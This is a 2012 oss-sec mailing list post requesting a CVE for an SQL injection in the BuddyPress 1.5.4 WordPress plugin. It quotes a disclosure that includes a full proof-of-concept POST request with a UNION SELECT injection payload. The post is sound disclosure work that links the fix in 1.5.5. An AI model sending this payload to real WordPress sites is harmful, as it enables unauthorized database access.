oss-sec mailing list archives
CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4
From: Henri Salo <henri () nerv fi>
Date: Sun, 15 Apr 2012 12:05:37 +0300
Hello, Can I get 2012 CVE-identifier for WordPress BuddyPress-plugin SQL-injection. Affected: 1.5.4 Fixed: 1.5.5 Vendor: http://buddypress.org/2012/03/buddypress-1-5-5/ OSVDB: http://osvdb.org/show/osvdb/80763 Changelog: http://codex.buddypress.org/releases/version-1-5/ (doesn't seem to say about this issue) http://seclists.org/bugtraq/2012/Apr/4 """ Hi, I would like disclosure SQL injection vulnerability if Buddypress plugin affecting last versions. This issue was reported to developers and resolved in 1.5.5 version. So, I suggest all having this plugin in their blogs update to last version, if you haven't done it yet. Example of POST message with sql injection is below. POST /wp-load.php HTTP/1.1 User-Agent: Mozilla Host: example.com Accept: */* Referer: http://example.com/activity/?s=b Connection: Keep-Alive Content-Length: 153 Content-Type: application/x-www-form-urlencoded action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+ """ - Henri Salo
Current thread:
- CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4 Henri Salo (Apr 15)
- Re: CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4 Kurt Seifried (Apr 16)